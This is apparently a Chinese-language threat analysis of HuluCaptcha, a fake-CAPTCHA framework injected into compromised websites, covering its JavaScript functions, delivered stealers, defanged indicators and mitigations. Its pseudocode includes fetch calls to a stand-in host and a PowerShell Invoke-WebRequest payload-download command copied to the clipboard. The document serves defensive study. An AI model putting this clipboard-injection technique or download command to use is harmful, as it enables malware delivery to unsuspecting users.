了解 FakeCaptcha

FakeCaptcha 攻擊將惡意程式碼嵌入看似標準的 CAPTCHA Challenge中，利用用戶信任在瀏覽器中執行有害腳本。HuluCaptcha 框架是這種方法的典型代表，使用混淆的 JavaScript、域名生成算法和 Payload 傳遞機制來危害系統。通過模擬合法 CAPTCHA，它繞過安全措施，對網站擁有者和用戶構成重大威脅。

HuluCaptcha 的技術分析

HuluCaptcha 框架依賴於注入受損網站的惡意 JavaScript，執行諸如受害者追蹤、Payload 傳遞和命令執行等任務。完整程式碼可在 GitHub 上取得（ HuluCaptcha Code ），提供了其功能的深入洞察。

程式碼中的關鍵功能

程式碼定義了多個功能（f、f2、f3、...、f12），每個功能在攻擊鏈中貢獻特定角色：

1. Function f ：可能是入口點，初始化變數並進行初始 HTTP Request 以設置攻擊。
2. Function f2 ：通過事件監聽器（例如 keydown 、 keyup ）監控用戶輸入，可能用於認證竊取(Credential theft)或活動追蹤(Activity tracking)。
3. Function f3 ：處理網域名產生或操作，用於與 command-and-control（C2）伺務器 通信。
4. Function f4 ：管理 localStorage 中的資料存儲，確保跨 Session 的持久性。
5. Function f5 ：執行剪貼板操作，使用 navigator.clipboard.writeText 複製惡意命令。
6. Function f6 ：管理 HTTP Request（POST、GET）以獲取 Payload 或與 C2 伺務器通信。
7. Function f7 ：以 500 毫秒間隔執行，可能檢查更新或執行定期任務以規避檢測。
8. Function f8 ：在 3000 毫秒延遲後執行 Powershell 命令，針對 Windows 系統。
9. Function f9 ：生成隨機數或標識符，用於多態性或追蹤。
10. Function f10 ：記錄錯誤或向攻擊者報告。
11. Function f11 ：將追蹤資料（例如 refid ）存儲在 localStorage 中，用於聯盟或受害者追蹤。
12. Function f12 ：作為主循環，協調其他功能。

技術特點

• 時間延遲 ：功能如 f7（500 毫秒間隔）和 f8（3000 毫秒延遲）使用定時來分散攻擊，降低被安全工具檢測的可能性。
• 剪貼板操作 ：使用 navigator.clipboard.writeText 使惡意軟體複製命令，若用戶將其貼到終端可能執行。
• 事件監聽器 ：監聽 keydown 、 keyup 、 blur 和 click 事件，支持鍵盤記錄或行為觸發動作。
• 存儲操作 ：程式碼使用 localStorage.setItem("refid", vF9/vF11) 存儲追蹤資料，確保持久性。
• 域名操作 ：動態產生網域名（例如 amoliera[.]com 變體）以維持 C2 通信，儘管網域名可能被移除。
• Powershell 命令 ：針對 Windows 系統，利用 Powershell 的靈活性執行惡意任務。

Pseudocode 示例

為說明程式碼的功能，考慮以下簡化的 Pseudocode：

// 初始化攻擊
function f() {
    var v1 = "initial_value";
    fetch("https://example.com/malicious");
}
// 定期任務
function f7() {
    setInterval(function() {
        if (condition_met) {
            fetch("https://example.com/update");
        }
    }, 500);
}
// 延遲執行命令
function f8() {
    setTimeout(function() {
        var cmd = "powershell -c Invoke-WebRequest -Uri 'https://example.com/payload'";
        navigator.clipboard.writeText(cmd);
    }, 3000);
}
// 存儲追蹤資料
function f11() {
    var refId = generateRandomId();
    localStorage.setItem("refid", refId);
}

此 Pseudocode 突顯了延遲、剪貼板操作和存儲在惡意用途中的應用。

涉及的惡意軟體

HuluCaptcha 分發多種惡意軟體：

• Lumma Stealer ：自 2022 年 8 月起作為 Malware-as-a-Service 提供，以 C 語言開發的資訊竊取器（ Lumma Stealer ）。它針對加密貨幣錢包和 2FA 瀏覽器擴展，通過 HTTP POST（用戶代理為 "TeslaBrowser/5.5"）竊取資料，包含非常駐加載器(non-resident loader)以執行額外 Payload。
• Aurotun Stealer ：文獻較少，但可能是具有類似功能的資訊竊取器（ Aurotun Stealer ）。
• Donut Injector ：開源記憶體注入器/加載器，支持執行 VBScript、JScript、EXE、DLL 和 dotNET 程式集（ Donut Injector ）。它已被用於針對美國組織的攻擊。

這些惡意軟體通過受損網站傳遞，通常偽裝成合法軟體。

攻擊基礎設施

HuluCaptcha 攻擊利用複雜的基礎設施，如下表所示：

類別	示例
受損網站	dvir[.]com, losangelescrc[.]usc[.]edu, gravitypowersolution[.]com
第一/第二階段注入域名	analytiwave[.]com, goclouder[.]com, sharecloud[.]click
偽造 Cloudflare 頁面域名	security[.]claufgaurd[.]com, security[.]clodaflare[.]com
Payload 伺務器域名	amoliera[.]com, core[.]sopeited[.]com, sopeited[.]org
Payload C2	91.200.14[.]69:7712, westrosei[.]live/agoz, jawdedmirror[.]run/ewqd
已知 Payload Hashes	c078b10c298528c6a50a776519ef2be6819c43642aa82a88784d85e35d6b8298
伺務器後門 Hashes	c83d1d9b7fc84bf5a5feb320795d4e82615f82ad1a1520148ba9169d13272a4c

此基礎設施支持持久性、規避和攻擊的持續更新。

緩解策略

為對抗 HuluCaptcha 和類似威脅：

1. 更新軟體 ：定期更新WordPress 等內容管理系統的漏洞。
2. 使用 Web 應用程式防火牆 ：部署 WAF 以檢測和阻止惡意流量。
3. 監控異常 ：檢查日誌中是否有意外的 JavaScript 注入或異常活動。
4. 教育用戶 ：警告用戶注意可疑的 CAPTCHA 和不受信任的下載。
5. 安全編碼實踐 ：驗證輸入並清理輸出以防止注入。

結論

HuluCaptcha 框架是一種複雜的 FakeCaptcha 攻擊，通過受損網站分發惡意軟體，構成重大威脅。其使用混淆的 JavaScript、動態域名和剪貼板操作等隱形技術使其成為強大的威脅。通過了解其技術組件和基礎設施，網路安全專業人員可以制定有效的防禦措施。本報告強調了強大安全措施和警惕性的重要性，以緩解此類攻擊。

關鍵引用

1. HuluCaptcha: An Example of a FakeCaptcha Framework
2. Lumma Stealer Malware Details on Malpedia
3. Aurotun Stealer Malware Details on Malpedia
4. Donut Injector Malware Details on Malpedia
5. HuluCaptcha Framework Code on GitHub Gist